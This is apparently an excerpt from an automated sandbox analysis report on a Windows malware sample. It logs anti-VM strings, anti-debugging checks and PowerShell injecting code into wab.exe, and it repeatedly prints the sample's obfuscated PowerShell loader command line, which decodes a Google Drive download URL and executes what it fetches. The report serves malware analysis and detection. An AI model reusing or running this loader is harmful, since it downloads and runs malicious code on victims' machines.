            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96801Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96442Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96202Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96094Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95969Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95859Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95740Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95609Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95500Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95281Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95171Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95062Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94844Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94625Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94515Jump to behavior
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: powershell.exe, 00000004.00000002.1999089456.00000000074A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.2279767927.00000221EBE1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
            Source: wscript.exe, 00000000.00000003.1643712541.000002B3F1A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_025770B8 CheckRemoteDebuggerPresent,9_2_025770B8
            Hides threads from debuggers
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_047CA758 LdrInitializeThunk,4_2_047CA758
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 10_2_00621AE4 GetProcessHeap,HeapFree,10_2_00621AE4
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 10_2_006232C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_006232C0
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 10_2_00623450 SetUnhandledExceptionFilter,10_2_00623450
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 257FE24Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$unbumped = 1;$svveflyvers='substrin';$svveflyvers+='g';function disken($sthamrenes){$hotelvrelserne=$sthamrenes.length-$unbumped;for($acned=5; $acned -lt $hotelvrelserne; $acned+=(6)){$professorships+=$sthamrenes.$svveflyvers.invoke($acned, $unbumped);}$professorships;}function jots($misagent){& ($jargonens) ($misagent);}$orthoarsenite=disken 'dyrenm.agisofornozspasmi gammlcomplljordsaint,a/ proa5gaest.anu y0slibr ,ters(underwtulwailyshanfa eldindsyostrmpw snebsc.lam indtngu.nat tabu balan1docum0cowsh. obl,0reap.; ti.l xorinwcatacifusi,nroya 6bijug4cr.ck;efter reaffxbalsa6 va,b4.arco;efter ,andlr sek.vmilit: nint1fremk2beiji1bl,nk.uncre0 hard) albr a,tneg ga.se sl.dc s.inkundero argo/kazat2banka0outs,1impra0reson0unapp1bille0pikke1eleme rveskf mothitjenerunma,epriapfk.emto anpaxactiv/ufo,d1 iru2pizzl1tetra.a,opt0coun ';$orlops=disken 'clauduphrensindhaedrejerfolk.-ru,dra carpghkasse unwan relatsuffu ';$horrify=disken 'r,nsehespaltinodot.ranoprent.sfe.ie:,rage/ kast/semicdopfrsrtel,diflydevhazieespeck.nickeg dtro bndso drieghansilas.emetradu..asshcbdet.ounprampilus/le.oruspinncnon.i? filiefyrsvxspellpcam.sofragmrtilbatsocia=attacdpouncobjergwdekorn.nterlugekootalmsagastrdc,pry&justiivolumdl,tsv=uds,y1 cyliui.rigj istoh indilsognemlnninuprveu_ lakubriksyuncon5mangejamtsr0 ga.ettropiulathevhackehrail,xo,phasoologbskovtnmesse0 johnginsemftvivl5 bespxantiacbidrac,untsloestrqsc.mmumayorn ze.efracem ';$cachinnate=disken 'swine> kumy ';$jargonens=disken 'unp.uico.tre d.ngx aggr ';$pessimistisk='blanketten';jots (disken 'predrsinfuse pr,ntsalgs-co ticdiffeointelnpaa lt stboe envanklaphtkva m tilbr-redobpop,avaun,xptchlorh urr er gstforsl:homet\ impabklag,a contdflet.nkr,gsioverdnafrunguni.ie isoprdesia.actustduplixudstyttiltu ly.u-firehvmidshafl,kel.kspoubortkeembry noto$ resupunblieep,stsnoncosmven igarewmilldiidra,ts artitpedomism lss hypokpe,fe;folke ');jots (disken 'vacatibekenf stin inhal( lym toenoleaplodsgonertu.end-noy npeata.a,ngentkommuhchart juict rigs:tokom\c.urib jenkainfardnobilnfor.oifininnaabengaffa eclairr nonr.age.tt til,x,iktotunbla)ova o{hundee nstmxfor oi onant ,xsa}aand.;tr,ld ');$monotonises = disken 'madolebuzzwcplaceh tromosmede affil% otaacurcip chrop bre,dbestta sidetprincalegwo%,anke\dyppekkvg.elafkoravoldspcotanj krisaunloqgspareth,alpeproc.rkeesdserita.datapsdisple radap er,v thomi& linj&forko al.nefalusc hydrhchiliodetru exone$rekur ';jots (disken ' icho$al rmgsalgsl ekliokonnibselfsaafs.alde.om:frnvnsc ianyfac.dnstubbk le tr alumois.denforhismi levbromombeboen hngsichefknpseudgforsms menu=fr ki(catticskabnmsierrdvr.ma .rusk/outstc laic virtu$,roximst,afo pocn uryosjleat scylo fi.knagurkifiberstresaea.tifsc cre)mes.n ');jots (disken 'sleke$skrkpgquatel,koleohairmbtrotta allulkulka: emorpsemitadogslrunthraopfrsdunderruforrobaadeptiptap,isfoibemusn hebdgud ad=refam$ freuhfjendo newlrvinker b
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$unbumped = 1;$svveflyvers='substrin';$svveflyvers+='g';function disken($sthamrenes){$hotelvrelserne=$sthamrenes.length-$unbumped;for($acned=5; $acned -lt $hotelvrelserne; $acned+=(6)){$professorships+=$sthamrenes.$svveflyvers.invoke($acned, $unbumped);}$professorships;}function jots($misagent){& ($jargonens) ($misagent);}$orthoarsenite=disken 'dyrenm.agisofornozspasmi gammlcomplljordsaint,a/ proa5gaest.anu y0slibr ,ters(underwtulwailyshanfa eldindsyostrmpw snebsc.lam indtngu.nat tabu balan1docum0cowsh. obl,0reap.; ti.l xorinwcatacifusi,nroya 6bijug4cr.ck;efter reaffxbalsa6 va,b4.arco;efter ,andlr sek.vmilit: nint1fremk2beiji1bl,nk.uncre0 hard) albr a,tneg ga.se sl.dc s.inkundero argo/kazat2banka0outs,1impra0reson0unapp1bille0pikke1eleme rveskf mothitjenerunma,epriapfk.emto anpaxactiv/ufo,d1 iru2pizzl1tetra.a,opt0coun ';$orlops=disken 'clauduphrensindhaedrejerfolk.-ru,dra carpghkasse unwan relatsuffu ';$horrify=disken 'r,nsehespaltinodot.ranoprent.sfe.ie:,rage/ kast/semicdopfrsrtel,diflydevhazieespeck.nickeg dtro bndso drieghansilas.emetradu..asshcbdet.ounprampilus/le.oruspinncnon.i? filiefyrsvxspellpcam.sofragmrtilbatsocia=attacdpouncobjergwdekorn.nterlugekootalmsagastrdc,pry&justiivolumdl,tsv=uds,y1 cyliui.rigj istoh indilsognemlnninuprveu_ lakubriksyuncon5mangejamtsr0 ga.ettropiulathevhackehrail,xo,phasoologbskovtnmesse0 johnginsemftvivl5 bespxantiacbidrac,untsloestrqsc.mmumayorn ze.efracem ';$cachinnate=disken 'swine> kumy ';$jargonens=disken 'unp.uico.tre d.ngx aggr ';$pessimistisk='blanketten';jots (disken 'predrsinfuse pr,ntsalgs-co ticdiffeointelnpaa lt stboe envanklaphtkva m tilbr-redobpop,avaun,xptchlorh urr er gstforsl:homet\ impabklag,a contdflet.nkr,gsioverdnafrunguni.ie isoprdesia.actustduplixudstyttiltu ly.u-firehvmidshafl,kel.kspoubortkeembry noto$ resupunblieep,stsnoncosmven igarewmilldiidra,ts artitpedomism lss hypokpe,fe;folke ');jots (disken 'vacatibekenf stin inhal( lym toenoleaplodsgonertu.end-noy npeata.a,ngentkommuhchart juict rigs:tokom\c.urib jenkainfardnobilnfor.oifininnaabengaffa eclairr nonr.age.tt til,x,iktotunbla)ova o{hundee nstmxfor oi onant ,xsa}aand.;tr,ld ');$monotonises = disken 'madolebuzzwcplaceh tromosmede affil% otaacurcip chrop bre,dbestta sidetprincalegwo%,anke\dyppekkvg.elafkoravoldspcotanj krisaunloqgspareth,alpeproc.rkeesdserita.datapsdisple radap er,v thomi& linj&forko al.nefalusc hydrhchiliodetru exone$rekur ';jots (disken ' icho$al rmgsalgsl ekliokonnibselfsaafs.alde.om:frnvnsc ianyfac.dnstubbk le tr alumois.denforhismi levbromombeboen hngsichefknpseudgforsms menu=fr ki(catticskabnmsierrdvr.ma .rusk/outstc laic virtu$,roximst,afo pocn uryosjleat scylo fi.knagurkifiberstresaea.tifsc cre)mes.n ');jots (disken 'sleke$skrkpgquatel,koleohairmbtrotta allulkulka: emorpsemitadogslrunthraopfrsdunderruforrobaadeptiptap,isfoibemusn hebdgud ad=refam$ freuhfjendo newlrvinker b
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$unbumped = 1;$svveflyvers='substrin';$svveflyvers+='g';function disken($sthamrenes){$hotelvrelserne=$sthamrenes.length-$unbumped;for($acned=5; $acned -lt $hotelvrelserne; $acned+=(6)){$professorships+=$sthamrenes.$svveflyvers.invoke($acned, $unbumped);}$professorships;}function jots($misagent){& ($jargonens) ($misagent);}$orthoarsenite=disken 'dyrenm.agisofornozspasmi gammlcomplljordsaint,a/ proa5gaest.anu y0slibr ,ters(underwtulwailyshanfa eldindsyostrmpw snebsc.lam indtngu.nat tabu balan1docum0cowsh. obl,0reap.; ti.l xorinwcatacifusi,nroya 6bijug4cr.ck;efter reaffxbalsa6 va,b4.arco;efter ,andlr sek.vmilit: nint1fremk2beiji1bl,nk.uncre0 hard) albr a,tneg ga.se sl.dc s.inkundero argo/kazat2banka0outs,1impra0reson0unapp1bille0pikke1eleme rveskf mothitjenerunma,epriapfk.emto anpaxactiv/ufo,d1 iru2pizzl1tetra.a,opt0coun ';$orlops=disken 'clauduphrensindhaedrejerfolk.-ru,dra carpghkasse unwan relatsuffu ';$horrify=disken 'r,nsehespaltinodot.ranoprent.sfe.ie:,rage/ kast/semicdopfrsrtel,diflydevhazieespeck.nickeg dtro bndso drieghansilas.emetradu..asshcbdet.ounprampilus/le.oruspinncnon.i? filiefyrsvxspellpcam.sofragmrtilbatsocia=attacdpouncobjergwdekorn.nterlugekootalmsagastrdc,pry&justiivolumdl,tsv=uds,y1 cyliui.rigj istoh indilsognemlnninuprveu_ lakubriksyuncon5mangejamtsr0 ga.ettropiulathevhackehrail,xo,phasoologbskovtnmesse0 johnginsemftvivl5 bespxantiacbidrac,untsloestrqsc.mmumayorn ze.efracem ';$cachinnate=disken 'swine> kumy ';$jargonens=disken 'unp.uico.tre d.ngx aggr ';$pessimistisk='blanketten';jots (disken 'predrsinfuse pr,ntsalgs-co ticdiffeointelnpaa lt stboe envanklaphtkva m tilbr-redobpop,avaun,xptchlorh urr er gstforsl:homet\ impabklag,a contdflet.nkr,gsioverdnafrunguni.ie isoprdesia.actustduplixudstyttiltu ly.u-firehvmidshafl,kel.kspoubortkeembry noto$ resupunblieep,stsnoncosmven igarewmilldiidra,ts artitpedomism lss hypokpe,fe;folke ');jots (disken 'vacatibekenf stin inhal( lym toenoleaplodsgonertu.end-noy npeata.a,ngentkommuhchart juict rigs:tokom\c.urib jenkainfardnobilnfor.oifininnaabengaffa eclairr nonr.age.tt til,x,iktotunbla)ova o{hundee nstmxfor oi onant ,xsa}aand.;tr,ld ');$monotonises = disken 'madolebuzzwcplaceh tromosmede affil% otaacurcip chrop bre,dbestta sidetprincalegwo%,anke\dyppekkvg.elafkoravoldspcotanj krisaunloqgspareth,alpeproc.rkeesdserita.datapsdisple radap er,v thomi& linj&forko al.nefalusc hydrhchiliodetru exone$rekur ';jots (disken ' icho$al rmgsalgsl ekliokonnibselfsaafs.alde.om:frnvnsc ianyfac.dnstubbk le tr alumois.denforhismi levbromombeboen hngsichefknpseudgforsms menu=fr ki(catticskabnmsierrdvr.ma .rusk/outstc laic virtu$,roximst,afo pocn uryosjleat scylo fi.knagurkifiberstresaea.tifsc cre)mes.n ');jots (disken 'sleke$skrkpgquatel,koleohairmbtrotta allulkulka: emorpsemitadogslrunthraopfrsdunderruforrobaadeptiptap,isfoibemusn hebdgud ad=refam$ freuhfjendo newlrvinker bJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$unbumped = 1;$svveflyvers='substrin';$svveflyvers+='g';function disken($sthamrenes){$hotelvrelserne=$sthamrenes.length-$unbumped;for($acned=5; $acned -lt $hotelvrelserne; $acned+=(6)){$professorships+=$sthamrenes.$svveflyvers.invoke($acned, $unbumped);}$professorships;}function jots($misagent){& ($jargonens) ($misagent);}$orthoarsenite=disken 'dyrenm.agisofornozspasmi gammlcomplljordsaint,a/ proa5gaest.anu y0slibr ,ters(underwtulwailyshanfa eldindsyostrmpw snebsc.lam indtngu.nat tabu balan1docum0cowsh. obl,0reap.; ti.l xorinwcatacifusi,nroya 6bijug4cr.ck;efter reaffxbalsa6 va,b4.arco;efter ,andlr sek.vmilit: nint1fremk2beiji1bl,nk.uncre0 hard) albr a,tneg ga.se sl.dc s.inkundero argo/kazat2banka0outs,1impra0reson0unapp1bille0pikke1eleme rveskf mothitjenerunma,epriapfk.emto anpaxactiv/ufo,d1 iru2pizzl1tetra.a,opt0coun ';$orlops=disken 'clauduphrensindhaedrejerfolk.-ru,dra carpghkasse unwan relatsuffu ';$horrify=disken 'r,nsehespaltinodot.ranoprent.sfe.ie:,rage/ kast/semicdopfrsrtel,diflydevhazieespeck.nickeg dtro bndso drieghansilas.emetradu..asshcbdet.ounprampilus/le.oruspinncnon.i? filiefyrsvxspellpcam.sofragmrtilbatsocia=attacdpouncobjergwdekorn.nterlugekootalmsagastrdc,pry&justiivolumdl,tsv=uds,y1 cyliui.rigj istoh indilsognemlnninuprveu_ lakubriksyuncon5mangejamtsr0 ga.ettropiulathevhackehrail,xo,phasoologbskovtnmesse0 johnginsemftvivl5 bespxantiacbidrac,untsloestrqsc.mmumayorn ze.efracem ';$cachinnate=disken 'swine> kumy ';$jargonens=disken 'unp.uico.tre d.ngx aggr ';$pessimistisk='blanketten';jots (disken 'predrsinfuse pr,ntsalgs-co ticdiffeointelnpaa lt stboe envanklaphtkva m tilbr-redobpop,avaun,xptchlorh urr er gstforsl:homet\ impabklag,a contdflet.nkr,gsioverdnafrunguni.ie isoprdesia.actustduplixudstyttiltu ly.u-firehvmidshafl,kel.kspoubortkeembry noto$ resupunblieep,stsnoncosmven igarewmilldiidra,ts artitpedomism lss hypokpe,fe;folke ');jots (disken 'vacatibekenf stin inhal( lym toenoleaplodsgonertu.end-noy npeata.a,ngentkommuhchart juict rigs:tokom\c.urib jenkainfardnobilnfor.oifininnaabengaffa eclairr nonr.age.tt til,x,iktotunbla)ova o{hundee nstmxfor oi onant ,xsa}aand.;tr,ld ');$monotonises = disken 'madolebuzzwcplaceh tromosmede affil% otaacurcip chrop bre,dbestta sidetprincalegwo%,anke\dyppekkvg.elafkoravoldspcotanj krisaunloqgspareth,alpeproc.rkeesdserita.datapsdisple radap er,v thomi& linj&forko al.nefalusc hydrhchiliodetru exone$rekur ';jots (disken ' icho$al rmgsalgsl ekliokonnibselfsaafs.alde.om:frnvnsc ianyfac.dnstubbk le tr alumois.denforhismi levbromombeboen hngsichefknpseudgforsms menu=fr ki(catticskabnmsierrdvr.ma .rusk/outstc laic virtu$,roximst,afo pocn uryosjleat scylo fi.knagurkifiberstresaea.tifsc cre)mes.n ');jots (disken 'sleke$skrkpgquatel,koleohairmbtrotta allulkulka: emorpsemitadogslrunthraopfrsdunderruforrobaadeptiptap,isfoibemusn hebdgud ad=refam$ freuhfjendo newlrvinker bJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
